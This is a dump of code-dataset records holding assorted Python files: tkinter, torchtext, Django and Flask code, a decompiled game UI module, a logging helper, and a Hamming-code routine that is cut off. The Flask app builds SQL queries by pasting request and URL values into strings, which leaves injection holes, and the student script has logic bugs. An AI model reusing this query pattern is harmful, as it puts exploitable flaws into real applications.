columnspan=5, sticky=N + S + E + W, padx=20, pady=(60, 20))\n\n for i in range(0, 5):\n self.columnconfigure(i, weight=5)\n\n self.columnconfigure(2, weight=1)\n\n self.rowconfigure(0, weight=1)\n for i in range(1, 5):\n self.rowconfigure(i, weight=2)\n","sub_path":"src/views/setTimeView.py","file_name":"setTimeView.py","file_ext":"py","file_size_in_byte":6272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"9287613","text":"from torchtext.vocab import Vectors\nfrom torchtext import data\nimport jieba\n\n# import sys\n# import os\n# currentUrl = os.path.dirname(__file__)\n# parentUrl = os.path.abspath(os.path.join(currentUrl, os.pardir))\n# sys.path.append(parentUrl)\n# from my_args import *\n\n\ndef load_word_vectors(model_name, model_path):\n vectors = Vectors(name=model_name, cache=model_path)\n return vectors\n\n\ndef tokenizer_zh(x):\n \"\"\"\n \"The quick fox jumped over a lazy dog.\" -> (tokenization)\n [\"The\", \"quick\", \"fox\", \"jumped\", \"over\", \"a\", \"lazy\", \"dog\", \".\"]\n \"\"\"\n res = [w for w in jieba.cut(x, cut_all=False)]\n return res\n\n\ndef build_stop_words_set(set_dir):\n stop_words = []\n with open(set_dir) as f:\n for l in f.readlines():\n stop_words.append(l.strip())\n return stop_words\n\n\ndef create_field(args):\n stop_words = build_stop_words_set(args.dataset + 'stop_words.txt')\n text_field = data.Field(sequential=True, tokenize=tokenizer_zh, fix_length=args.sen_len, stop_words=stop_words)\n label_field = data.Field(sequential=False)\n return text_field, label_field\n\n\ndef get_dataset(text_field, label_field, args):\n train, valid, test = data.TabularDataset.splits(path=args.dataset, format='tsv', skip_header=False,\n train='train.tsv',\n validation='valid.tsv',\n test='test.tsv',\n fields=[('text', text_field), ('label', label_field)]\n )\n return train, valid, test\n\n\ndef load_dataset(text_field, label_field, args, **kwargs):\n # ************************** get torch text dataset ***************************\n train_dataset, dev_dataset, test_dataset = get_dataset(text_field, label_field, args)\n\n # ************************** build 
vocabulary *********************************\n if args.static and args.pretrained_name and args.pretrained_path:\n # load pre-trained embedding vocab\n vectors = load_word_vectors(args.pretrained_name, args.pretrained_path)\n text_field.build_vocab(train_dataset, dev_dataset, vectors=vectors)\n else:\n text_field.build_vocab(train_dataset, dev_dataset) # build vocab from train/val dataset only\n\n label_field.build_vocab(train_dataset, dev_dataset) # change from '0', '1' to 0,1\n\n print('Num of class is ' + str(len(label_field.vocab)))\n print(label_field.vocab.stoi)\n\n # ************************** build Iterator ***********************************\n train_iter, dev_iter, test_iter = data.Iterator.splits(\n (train_dataset, dev_dataset, test_dataset),\n batch_sizes=(args.batch_size, args.batch_size, args.batch_size),\n sort_key=lambda x: len(x.text),\n **kwargs)\n return train_iter, dev_iter, test_iter\n\n\n# if __name__ == \"__main__\":\n#\n# args = build_args_parser()\n#\n# Text_field, Label_field = create_field(args)\n# print(Text_field) # torchtext.data.field.Field object\n# print(Label_field) # torchtext.data.field.Field object\n#\n# print('TEST Function: get_dataset ....')\n# Train_dataset, Dev_dataset, Test_dataset = get_dataset(Text_field, Label_field, args)\n#\n# max_len = -1\n# id = 0\n#\n# for i in range(len(Train_dataset)):\n# if len(Train_dataset[i].text) > max_len:\n# max_len = len(Train_dataset[i].text)\n# id = i\n#\n# print(id)\n# print('max length %d' % max_len)\n#\n# print(Train_dataset[id].text) # ['你', '快', '休息', '我爱你', '小度']\n# print(Train_dataset[id].label) # 1\n#\n# Train_iter, Dev_iter, Test_iter = load_dataset(Text_field, Label_field, args,\n# device=-1, repeat=False, shuffle=True)\n# # Test_iter\n# batch = next(iter(Train_iter))\n# print(batch.text.shape)\n# print(batch.label.shape)\n#\n# # vectors = load_word_vectors('sgns.zhihu.word', '../pretrained')\n","sub_path":"fast_text_torch/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"31614030","text":"# -*- coding: utf-8 -*-\nfrom utils.decorators import json_response, requires_get\nfrom venezuela.models import Municipio, Parroquia\nimport json\n\n@json_response\n@requires_get\ndef municipios_json(request, pk):\n \"\"\"\n Gets the list of municipios for the selected state\n Parameters\n - pk (int) = primary key of the state\n Returns\n - {'success': Boolean, 'municipios': Dictionary}\n e.g.:\n - Json {\n 'success': True, \n 'municipios': \n {\"id\": 223, \"nombre\": \"Acevedo\"}, \n {\"id\": 224, \"nombre\": \"Andres Bello\"}, \n {...}, {...}}\n \"\"\"\n\n if pk:\n pk = int(pk)\n municipo = Municipio.objects.filter(estado=pk)\n municipo_list = [{\"id\": m.id, \"nombre\": m.municipio} for m in municipo]\n return {'success': True, 'municipios': municipo_list}\n\n return {'success': False, 'error': \"No se pudo obtener la lista de municipios\"}\n\n@json_response\n@requires_get\ndef parroquias_json(request, pk):\n \"\"\"\n Gets the list of parroquias for the selected municipio\n Parameters\n - pk (int) = primary key of the municipio\n Returns\n - {'success': Boolean, 'parroquia': Dictionary}\n e.g.:\n - Json {\n 'success': True, \n 'parroquia': \n {\"id\": 223, \"nombre\": \"Acevedo\"}, \n {\"id\": 224, \"nombre\": \"Andres Bello\"}, \n {...}, {...}}\n \"\"\"\n\n if pk:\n pk = int(pk)\n parroquia = Parroquia.objects.filter(municipio=pk)\n parroquia_list = 
[{\"id\": p.id, \"nombre\": p.parroquia} for p in parroquia]\n return {'success': True, 'parroquias': parroquia_list}\n\n return {'success': False, 'error': \"No se pudo obtener la lista de las parroquias\"}\n","sub_path":"utils/vzla.py","file_name":"vzla.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"161176084","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/epicBattle/epic_prestige_progress.py\nfrom gui import makeHtmlString\nfrom gui.Scaleform.locale.EPIC_BATTLE import EPIC_BATTLE\nfrom gui.Scaleform.locale.RES_ICONS import RES_ICONS\nfrom gui.shared.formatters import icons, text_styles\nfrom gui.shared.gui_items import Vehicle\nfrom helpers import dependency, int2roman, i18n\nfrom skeletons.gui.game_control import IEpicBattleMetaGameController\nfrom skeletons.gui.shared import IItemsCache\nFRONTLINE_PRESTIGE_TOKEN_TEMPLATE = 'epicmetagame:prestige:%d'\nFRONTLINE_LEVEL_TOKEN_TEMPLATE = 'epicmetagame:levelup:%d'\n_ICON_NAME_TO_PRESTIGE_LEVEL = {'1': range(0, 4),\n '2': range(4, 7),\n '3': range(7, 10),\n '4': range(10, 11)}\n\nclass PrestigeBonusType(object):\n VEHICLE = 'vehicles'\n BADGE = 'dossier'\n\n\nclass LineSeparatorUI(object):\n GREY_LINE = 'greyLineSeparatorUI'\n GREEN_LINE = 'greenLineSeparatorUI'\n YELLOW_LINE = 'yellowLineSeparatorUI'\n\n\nclass PrestigeBlockIconPostfix(object):\n CURRENT = 'current'\n REACHED = 'reached'\n PRESTIGE = 'prestige'\n LOCKED = 'locked'\n UNLOCKED = 'unlocked'\n\n\nclass PrestigeBlockIconState(object):\n NORMAL = 'normal'\n SPECIAL = 'special'\n\n\nclass PrestigeProgressBlockUI(object):\n DEFAULT = 'PrestigeProgressBlockUI'\n CURRENT = 'CurrentPrestigeProgressBlockUI'\n VEHICLE_REWARD = 'VehicleRewardBlockUI'\n\n\n_AVAILABLE_LEVELS = sum(_ICON_NAME_TO_PRESTIGE_LEVEL.values(), [])\n\ndef getPrestigeProgressVO(allQuests, metaLevel, pPrestigeLevel, isMaxMetaLevel):\n maxPrestigeLevel = metaLevel.get('maxPrestigeRewardLevel', 0)\n prestigeAwards = _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel)\n epicMetaGameCtrl = dependency.instance(IEpicBattleMetaGameController)\n _, maxRewardClaimed = epicMetaGameCtrl.getSeasonData()\n blocksVO = []\n for index, prestigeAward in enumerate(prestigeAwards):\n isSpecialReward = prestigeAward is not None\n isVehicleReward = isSpecialReward and prestigeAward > 0\n isNextBlockFinalReward = index + 1 == maxPrestigeLevel\n isCurrentOrNextToCurrentBlock = index == pPrestigeLevel or pPrestigeLevel > 0 and index == pPrestigeLevel - 1\n icon = _getPrestigeBlockIconPath(index, pPrestigeLevel, isMaxMetaLevel, isSpecialReward)\n lineStyle = _getLineSeparatorLinkageForPrestigeLevel(index, pPrestigeLevel, isMaxMetaLevel) if not isNextBlockFinalReward else ''\n tankText = ''\n levelText = int2roman(index + 1)\n if isVehicleReward:\n itemsCache = dependency.instance(IItemsCache)\n vehicle = itemsCache.items.getItemByCD(prestigeAward)\n icon = _getTankIconPath(vehicle)\n tankText = _formatVehicleNameWithTypeIcon(vehicle)\n levelText = '' if not maxRewardClaimed else _rewardClaimedText()\n lineStyle = ''\n blocksVO.append({'prestigeLevel': index + 1,\n 'levelText': levelText,\n 'descText': tankText,\n 'canClaimVehicleReward': pPrestigeLevel == maxPrestigeLevel - 1 and isMaxMetaLevel and not maxRewardClaimed,\n 'blockStyle': _getBlockStyle(index, pPrestigeLevel, isVehicleReward),\n 'useShortSeparatorLine': isCurrentOrNextToCurrentBlock,\n 
'lineSeparatorStyle': lineStyle,\n 'iconPath': icon})\n\n return {'titleHtmlText': text_styles.promoSubTitle(EPIC_BATTLE.PRESTIGEPROGRESS_HEADERTITLE),\n 'progressBlocks': blocksVO}\n\n\ndef getPrestigeLevelAwardsVOs(allQuests, pPrestigeLevel, iconSize):\n currentPrestigeQuest = allQuests.get(FRONTLINE_PRESTIGE_TOKEN_TEMPLATE % pPrestigeLevel, None)\n awardsVO = []\n if currentPrestigeQuest:\n bonuses = currentPrestigeQuest.getBonuses()\n awardsVO = sum([ bonus.getEpicAwardVOs(withDescription=False, iconSize=iconSize) for bonus in bonuses ], [])\n return awardsVO\n\n\ndef getLevelAwardsVOs(allQuests, level, iconSize):\n currentLevelQuest = allQuests.get(FRONTLINE_LEVEL_TOKEN_TEMPLATE % level, None)\n awardsVO = []\n if currentLevelQuest:\n bonuses = currentLevelQuest.getBonuses()\n awardsVO = sum([ bonus.getEpicAwardVOs(withDescription=False, iconSize=iconSize) for bonus in bonuses ], [])\n return awardsVO\n\n\ndef getFinalTankRewardVehicleID(allQuests, maxPrestigeLevel):\n prestigeAwards = _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel)\n vehID = 0\n for prestigeAward in prestigeAwards:\n isSpecialReward = prestigeAward != []\n isVehicleReward = isSpecialReward and prestigeAward > 0\n if isVehicleReward:\n vehID = prestigeAward\n\n return vehID\n\n\ndef getFinalTankRewardIconPath(allQuests, maxPrestigeLevel):\n prestigeAwards = _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel)\n resultingPath = ''\n for prestigeAward in prestigeAwards:\n isSpecialReward = prestigeAward != []\n isVehicleReward = isSpecialReward and prestigeAward > 0\n if isVehicleReward:\n itemsCache = dependency.instance(IItemsCache)\n vehicle = itemsCache.items.getItemByCD(prestigeAward)\n resultingPath = _getTankIconPath(vehicle)\n\n return resultingPath\n\n\ndef getBlockBackgroundIndexForPrestigeLevel(pLevel):\n return next((k for k, v in _ICON_NAME_TO_PRESTIGE_LEVEL.iteritems() if pLevel in v))\n\n\ndef _getPrestigeLevelUpAwards(allQuests, maxPrestigeLevel):\n awards = []\n for i in xrange(0, maxPrestigeLevel + 1):\n currentPrestigeQuest = allQuests.get(FRONTLINE_PRESTIGE_TOKEN_TEMPLATE % i, None)\n specialAwardValue = None\n if currentPrestigeQuest:\n bonuses = currentPrestigeQuest.getBonuses()\n for bonus in bonuses:\n bonusName = bonus.getName()\n if bonusName == PrestigeBonusType.VEHICLE:\n bonusVehicles = bonus.getVehicles()\n if bonusVehicles is not None:\n specialAwardValue = bonusVehicles[0][0].intCD\n if specialAwardValue is None and bonusName == PrestigeBonusType.BADGE:\n if bonus.getBadges() is not None:\n specialAwardValue = 0\n\n awards.append(specialAwardValue)\n\n return awards\n\n\ndef _getLineSeparatorLinkageForPrestigeLevel(currentBlock, prestigeLevel, canPrestige):\n if currentBlock < prestigeLevel:\n lineStyle = LineSeparatorUI.GREEN_LINE\n elif canPrestige and currentBlock == prestigeLevel:\n lineStyle = LineSeparatorUI.YELLOW_LINE\n else:\n lineStyle = LineSeparatorUI.GREY_LINE\n return lineStyle\n\n\ndef _getPrestigeBlockIconPath(currentBlock, currentPrestigeLevel, canPrestige, isSpecial):\n if canPrestige and currentBlock == currentPrestigeLevel + 1:\n path = PrestigeBlockIconState.SPECIAL if isSpecial else PrestigeBlockIconState.NORMAL\n postfix = PrestigeBlockIconPostfix.UNLOCKED\n elif canPrestige and currentBlock == currentPrestigeLevel:\n path = getBlockBackgroundIndexForPrestigeLevel(currentBlock)\n postfix = PrestigeBlockIconPostfix.PRESTIGE\n elif currentBlock == currentPrestigeLevel:\n path = getBlockBackgroundIndexForPrestigeLevel(currentBlock)\n postfix = 
PrestigeBlockIconPostfix.CURRENT\n elif currentBlock < currentPrestigeLevel:\n path = getBlockBackgroundIndexForPrestigeLevel(currentBlock)\n postfix = PrestigeBlockIconPostfix.REACHED\n else:\n path = PrestigeBlockIconState.SPECIAL if isSpecial else PrestigeBlockIconState.NORMAL\n postfix = PrestigeBlockIconPostfix.LOCKED\n return RES_ICONS.getEpicPrestigeBlockIcon(path, postfix)\n\n\ndef _getBlockStyle(currentBlock, currentPrestigeLevel, isVehicleReward):\n blockName = PrestigeProgressBlockUI.DEFAULT\n if isVehicleReward:\n blockName = PrestigeProgressBlockUI.VEHICLE_REWARD\n elif currentBlock == currentPrestigeLevel:\n blockName = PrestigeProgressBlockUI.CURRENT\n return blockName\n\n\ndef _getTankIconPath(vehicle):\n return RES_ICONS.getEpicBattlesIcon(vehicle.name.replace(':', '_'))\n\n\ndef _formatVehicleNameWithTypeIcon(vehicle):\n icon = icons.makeImageTag(Vehicle.getTypeSmallIconPath(vehicle.type, vehicle.isElite))\n level = int2roman(vehicle.level)\n return text_styles.statInfo('{} {}{}'.format(level, icon, vehicle.userName))\n\n\ndef _rewardClaimedText():\n text = i18n.makeString(EPIC_BATTLE.PRESTIGEPROGRESS_TANKREWARDRECEIVEDLABEL)\n icon = icons.makeImageTag(RES_ICONS.MAPS_ICONS_BUTTONS_CHECKMARK)\n rewardClaimedText = makeHtmlString('html_templates:battle/epicBattle', 'prestigeProgressRewardClaimed', {'msg': '{} {}'.format(icon, text)})\n return rewardClaimedText\n","sub_path":"source/res/scripts/client/gui/Scaleform/daapi/view/lobby/epicBattle/epic_prestige_progress.py","file_name":"epic_prestige_progress.py","file_ext":"py","file_size_in_byte":8658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140956201","text":"#! python3\r\n#adds routes to MOBS based on inputs below\r\n\r\nfrom work.models import *\r\nfrom django.utils import timezone\r\nfrom datetime import timedelta\r\nimport csv\r\nimport calendar\r\n\r\nemployees = Employee.objects.exclude(end_date__lte=timezone.now())\r\nemployees = list(employees)\r\n\r\ndates = []\r\n\r\nfor i in range(2):\r\n dates.append(timezone.now().date() + timedelta(i))\r\n\r\nprint(\"You want to update the following dates: \"+str(dates))\r\n\r\n###Find employees working on each date###\r\n# for i in range(4):\r\n# query = Shift.objects.get_or_create(date=datetime.date(), driver=employees[i])\r\n\r\n###Populate jobs into each shift\r\ndate_shifts = Shift.objects.filter(date=dates[0])\r\njob_location_temp = Property.objects.get(pk=1)\r\n\r\nroute_list = Route.objects.all()\r\n# temp_route = Route.objects.get(pk=1)\r\n# print(temp_route.job_route.all()[0].route_location)\r\n\r\nfor d in dates:\r\n print(d)\r\n for route in route_list:\r\n if d.weekday()==int(route.weekday):\r\n shift, bool = Shift.objects.get_or_create(date=d,driver=route.driver)\r\n for prop in route.job_route.all():\r\n print(prop)\r\n shift.jobs_in_shift.get_or_create(job_location=prop.route_location,order=prop.order)\r\n # print(\"Created shift for %s %s\" % (d,j.driver))\r\n\r\n# for j in job_list:\r\n# print(j)\r\n# for l in j.job_route.all():\r\n# pass\r\n\r\n# for s in date_shifts:\r\n# print(s)\r\n#\r\n# job = s.jobs_in_shift.get_or_create(job_location=job_location_temp)\r\n# # job = s.jobs_in_shift.get_or_create(job_location=Property.objects.get(name='Pikesville Towne Center'))\r\n# print(job)\r\n# print(s.jobs_in_shift.all())\r\n\r\nprint('!! 
Run complete !!')\r\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111145540","text":"from classifier import *\nfrom selector import *\nfrom utilities import *\n\nstorage_params = {\n 'training_file': \"./test/training_data/taipei/training.data\",\n 'validation_file': \"./test/training_data/taipei/testing.data\",\n 'testing_file': \"./test/training_data/taipei/testing.data\",\n 'output_dir': \"./output/\"\n}\nstorage = Storage(storage_params)\n\nclassifier_params = {\n 'epoch': [5, 300],\n 'word_ngrams': [1, 12],\n 'loss': [\"ns\", \"hs\", \"softmax\"],\n 'lr': [0.01, 0.99],\n 'lr_update_rate': [5, 500],\n 'dim': [100, 700],\n 'bucket': [5000, 20000]\n}\nfilter_params = {\n 'f1': [0.5, 1]\n}\nclassifier = NoUseClassifier(storage, classifier_params, filter_params)\nclassifier.init(5)\nclassifier.valid()\nvalid_file = classifier.predict_validation()\nselector = MaxEntropySelector(valid_file)\nprint(selector.select(5))\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375324042","text":"from flask import Flask, render_template, request, flash, redirect, url_for, jsonify\nimport os \nimport sqlite3\nfrom datetime import datetime, date, time\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom collections import OrderedDict\n\nscope = ['https://spreadsheets.google.com/feeds',\n'https://www.googleapis.com/auth/drive']\ncredentials = ServiceAccountCredentials.from_json_keyfile_name('apikey.json', scope)\ngc = gspread.authorize(credentials)\nsheet = gc.open(\"Sneaker Deals\").sheet1\n\n\napp = Flask(__name__, static_url_path='/static')\napp.config.from_object(__name__)\n\n@app.route('/updateLikes', methods=['GET', 'POST'])\ndef updateLikes():\n conn = sqlite3.connect(\"database.db\")\n cur = conn.cursor()\n ID = request.form['ID']\n print(cur.execute(\"SELECT likeCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0])\n likeCount = int(cur.execute(\"SELECT likeCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0]) + int(request.form['likes'])\n cur.execute(\"UPDATE listTable SET likeCount=\"+str(likeCount)+\" WHERE listID=\" + ID + \";\") # scope the update to this row (the WHERE clause was missing)\n dislikeCount = int(cur.execute(\"SELECT dislikeCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0]) + int(request.form['dislikes'])\n cur.execute(\"UPDATE listTable SET dislikeCount=\"+str(dislikeCount)+\" WHERE listID=\" + ID + \";\") # scope the update to this row (the WHERE clause was missing)\n conn.commit()\n print(likeCount)\n return jsonify({'likeValue':likeCount,'dislikeValue':dislikeCount})\n\n@app.route('/expired', methods=['GET', 'POST'])\ndef expired():\n conn = sqlite3.connect(\"database.db\")\n cur = conn.cursor()\n increment = int(request.form['expiredCount'])\n ID = request.form['ID']\n expiredCount = int(cur.execute(\"SELECT expiredCount FROM listTable WHERE listID=\"+ID+\";\").fetchone()[0]) + increment\n cur.execute(\"UPDATE listTable SET expiredCount=\"+str(expiredCount)+\" WHERE listID=\" + ID + \";\")\n conn.commit()\n return jsonify({'expiredCount': expiredCount}) # a Flask view must return a response (was missing)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n conn = sqlite3.connect(\"database.db\")\n conn.row_factory = dict_factory\n cur = conn.cursor()\n listTable = [row for row in cur.execute(\"SELECT * FROM listTable ORDER BY posted DESC;\")]\n \n # tableList, tableMetaList = getTables()\n PAGES_PER_POST = 12\n someList = listTable\n page = request.args.get('page', 1, type=int)\n 
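# --- Illustrative note (added; not part of the original app) ---\n # The block below pages someList by hand, PAGES_PER_POST entries per page.\n # The total page count under this scheme is ceil(len / PAGES_PER_POST),\n # e.g. via ceiling division (hypothetical, not used below):\n total_pages = -(-len(someList) // PAGES_PER_POST)\n 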
print(len(someList))\n if len(someList) > PAGES_PER_POST:\n if not page:\n list2Show = someList[:PAGES_PER_POST]\n NEXT_URL = 2\n PREV_URL = None\n elif page:\n if len(someList)>page*PAGES_PER_POST:\n list2Show = someList[(page-1)*PAGES_PER_POST:page*PAGES_PER_POST]\n PREV_URL = page - 1\n NEXT_URL = page + 1\n\n else:\n list2Show = someList[(page-1)*PAGES_PER_POST:]\n NEXT_URL = None\n PREV_URL = page - 1\n else:\n NEXT_URL = None\n PREV_URL = None\n list2Show = someList\n if PREV_URL == 0:\n PREV_URL = None\n return render_template('index.html', tableMetaList = list2Show , NEXT_URL = NEXT_URL, PREV_URL = PREV_URL)\n\n\n@app.route('/subscribe', methods=['GET', 'POST'])\ndef subscribe():\n print(request.form)\n subSheet = gc.open(\"Sneaker Deals\").worksheet('Email Subscriptions')\n subSheet.append_row([request.form['name'], request.form['email']], value_input_option='RAW')\n return redirect(url_for('index'))\n\n@app.route('/post', methods=['GET', 'POST'])\ndef postTable():\n return render_template('sneakertable.html')\n\n@app.route('/list/<id>', methods=['GET', 'POST'])\ndef showList(id):\n conn = sqlite3.connect(\"database.db\")\n conn.row_factory = dict_factory\n cur = conn.cursor()\n listTable = [row for row in cur.execute(\"SELECT * FROM listTable WHERE listID=\"+id+\";\")][0]\n sneakerTable = [row for row in cur.execute(\"SELECT * FROM sneakerTable WHERE listID=\"+id+\";\")]\n return render_template('listTable.html', shoeList = sneakerTable, tableMeta = listTable)\n@app.route('/feedback', methods=['GET', 'POST'])\ndef feedback():\n subSheet = gc.open(\"Sneaker Deals\").worksheet('Feedback')\n subSheet.append_row([request.form['name'], request.form['email'], request.form['message']], value_input_option='RAW')\n return redirect(url_for('index'))\n\n# def getTables():\n# fullList = sheet.get_all_records()\n# tableList = []\n# tableCount = max([x['ID'] for x in fullList])\n# j=1\n# i=0\n# while(j<=tableCount):\n# saleList = []\n# while(fullList[i]['ID']==j):\n# saleList.append(fullList[i])\n# i+=1\n# if i >= len(fullList):\n# break\n# tableList.append(saleList)\n# j+=1\n# tableMetaList = []\n# for alist in tableList:\n# tableMetaList.append({'ID':alist[0]['ID'],'Name':alist[0]['NAME'],'Length':len(alist), 'Posted':alist[0]['POSTED'],'Tags':alist[0]['TAGS'].split(\",\"),'ExpiredCount':int(alist[0]['EXPIRED COUNT']),'likeCount':int(alist[0]['LIKE COUNT']),'dislikeCount':int(alist[0]['DISLIKE COUNT'])})\n\n# return (tableList, tableMetaList)\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\nif __name__ == '__main__':\n app.run(debug=False)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"172850267","text":"students = []\nwhile True:\n print (\" Press 1 to add student\")\n print (\" press 2 to search student\")\n print (\" press 3 to delete students\")\n print (\"press 4 to check number of students enrolled\")\n print ( \" press 5 to exit\")\n choice = int(input(\" Enter your choice : \")) # cast to int so the comparisons below work\n if choice == 1:\n student = {}\n student [ \"Name\"] = input (\" please enter student name:\") \n student [ \"Father name\"] = input (\" please Enter father name;\") \n student [ \"Cell number\"] = input (\" please Enter cell number:\") \n students.append(student) # append the new record, not the list itself\n
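# --- Illustrative note (added; not in the original script) ---\n # Each student is a plain dict keyed by the prompts above; a populated\n # record would look like (sample data, not produced by the program):\n # {\"Name\": \"Ada\", \"Father name\": \"Byron\", \"Cell number\": \"555-0100\"}\n 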
student[\"Name\"].lower() == name.lower() :\n print(\"Student with name \" + name + \"found and details are avaliable\")\n print (student)\n elif choice == 3: \n del student[ \" Father name\"]\n print (student) \n elif choice == 4:\n print (\" we curently have \" + str(len(students)) + 'Students')\n elif choice == 5:\n break\n\n\n","sub_path":"studentmanage.py","file_name":"studentmanage.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330483780","text":"\"\"\"Nice logging, with colors on Linux.\"\"\"\n\nfrom typing import Any, Union\nimport logging\nimport sys\n\nclass ColoredFormatter(logging.Formatter):\n \"\"\"Logging Formatter to add colors\"\"\"\n\n fg_bright_blue = \"\\x1b[94m\"\n fg_yellow = \"\\x1b[33m\"\n fg_red = \"\\x1b[31m\"\n fg_bright_red_bold = \"\\x1b[91;1m\"\n reset = \"\\x1b[0m\"\n\n def __init__(self, fmt, datefmt):\n super().__init__()\n self.messagefmt = fmt\n self.datefmt = datefmt\n\n self.formats = {\n logging.DEBUG: \"{}{}{}\".format(self.fg_bright_blue, self.messagefmt, self.reset),\n logging.INFO: \"{}\".format(self.messagefmt),\n logging.WARNING: \"{}{}{}\".format(self.fg_yellow, self.messagefmt, self.reset),\n logging.ERROR: \"{}{}{}\".format(self.fg_red, self.messagefmt, self.reset),\n logging.CRITICAL: \"{}{}{}\".format(self.fg_bright_red_bold, self.messagefmt, self.reset)\n }\n\n self.formatters = {\n logging.DEBUG: logging.Formatter(self.formats[logging.DEBUG], datefmt = self.datefmt),\n logging.INFO: logging.Formatter(self.formats[logging.INFO], datefmt = self.datefmt),\n logging.WARNING: logging.Formatter(self.formats[logging.WARNING], datefmt = self.datefmt),\n logging.ERROR: logging.Formatter(self.formats[logging.ERROR], datefmt = self.datefmt),\n logging.CRITICAL: logging.Formatter(self.formats[logging.CRITICAL], datefmt = self.datefmt)\n }\n\n def format(self, record):\n formatter = self.formatters[record.levelno]\n return formatter.format(record)\n\ndef setup_root_logger(\n no_color: bool = False,\n verbosity_level: int = 0,\n quietness_level: int = 0,\n messagefmt: str = \"[%(asctime)s][%(levelname)s] %(message)s (%(filename)s:%(lineno)d)\",\n messagefmt_verbose: str = \"[%(asctime)s][%(levelname)s] %(message)s (%(filename)s:%(lineno)d)\",\n datefmt: str = \"%Y-%m-%d %H:%M:%S\"\n ):\n messagefmt_to_use = messagefmt_verbose if verbosity_level else messagefmt\n logging_level = 10 * (2 + quietness_level - verbosity_level)\n if not no_color and sys.platform == \"linux\":\n formatter_class = ColoredFormatter\n else:\n formatter_class = logging.Formatter\n\n root_logger = logging.getLogger()\n root_logger.setLevel(logging_level)\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter_class(fmt = messagefmt_to_use, datefmt = datefmt))\n root_logger.addHandler(console_handler)\n\ndef logging_fatal(message, log_stack_info: bool = True, exit_code: int = 1):\n logging.critical(message, stack_info = log_stack_info)\n logging.critical(\"Exiting\")\n raise SystemExit(exit_code)\n\ndef log_tree(title, tree, finals = None, log_leaves_types = True, logging_level = logging.INFO):\n \"\"\"Log tree nicely if it is a dictionary.\n log_leaves_types can be False to log no leaves, True to log all leaves, or a tuple of types for which to log.\"\"\"\n if finals is None:\n finals = []\n if not isinstance(tree, dict):\n logging.log(msg = \"{}{}{}\".format(\n \"\".join([\" \" if final else \"│\" for final in finals[:-1]] + [\"└\" if final else \"├\" 
for final in finals[-1:]]),\n title,\n \": {}\".format(tree) if log_leaves_types is not False and (log_leaves_types is True or isinstance(tree, log_leaves_types)) else \"\"\n ), level = logging_level)\n else:\n logging.log(msg = \"{}{}\".format(\n \"\".join([\" \" if final else \"│\" for final in finals[:-1]] + [\"└\" if final else \"├\" for final in finals[-1:]]),\n title\n ), level = logging_level)\n tree_items = list(tree.items())\n for key, value in tree_items[:-1]:\n log_tree(key, value, finals = finals + [False], log_leaves_types = log_leaves_types, logging_level = logging_level)\n for key, value in tree_items[-1:]:\n log_tree(key, value, finals = finals + [True], log_leaves_types = log_leaves_types, logging_level = logging_level)\n\n# like logging.CRITICAl, logging.DEBUG etc\nFATAL = 60\n\ndef perror(s: Union[str, Any], e: OSError, logging_level: int = logging.ERROR):\n msg = f\"{s}{': ' if s else ''}{e.strerror}\"\n if logging_level == FATAL:\n logging_fatal(msg)\n else:\n logging.log(logging_level, msg)\n","sub_path":"android/adbsync/SAOLogging.py","file_name":"SAOLogging.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400475609","text":"import random\n\ndef hamming_encode(data: str) -> str:\n data_tmp = '00' + data[0] + '0' + data[1:4] + '0' + data[4:]\n parity = 0\n for i in range(len(data_tmp)):\n if data_tmp[i] == '1':\n parity ^= i + 1\n parity = (bin(parity)[2:].rjust(4, '0'))[::-1]\n data_tmp = parity[:2] + data[0] + parity[2] + data[1:4] + parity[3] + data[4:]\n return data_tmp + ('0' if parity_check(data_tmp) else '1')\n\ndef error_occur(data: str, num: int) -> str:\n error_list = random.sample(range(0, len(data)), num)\n error_data = data[:]\n for tmp in error_list:\n error_data = error_data[:tmp] + ('0' if error_data[tmp] == '1' else '1') + error_data[tmp + 1:]\n return error_data\n\ndef parity_check(data):\n count = 0\n for c in data:\n if c == '1':\n count += 1\n return count % 2 == 0\n\ndef hamming_decode(data: str, error = 0) -> str:\n if error > 0:\n data = error_occur(data, error)\n diff = 0\n for i in range(15):\n if data[i] == '1':\n diff ^= i + 1\n if diff == 0:\n return data[2] + data[4:7] + data[8:15]\n diff -= 1\n data = data[:diff] + ('0' if data[diff] == '1' else '1') + data[diff + 1:]\n re_encode = hamming_encode(data[2] + data[4:7] + data[8:15])\n if re_encode[15] == data[15]:\n return data[2] + data[4:7] + data[8:15]\n else:\n return False\n\nif __name__ == \"__main__\":\n file_lines = []\n f = 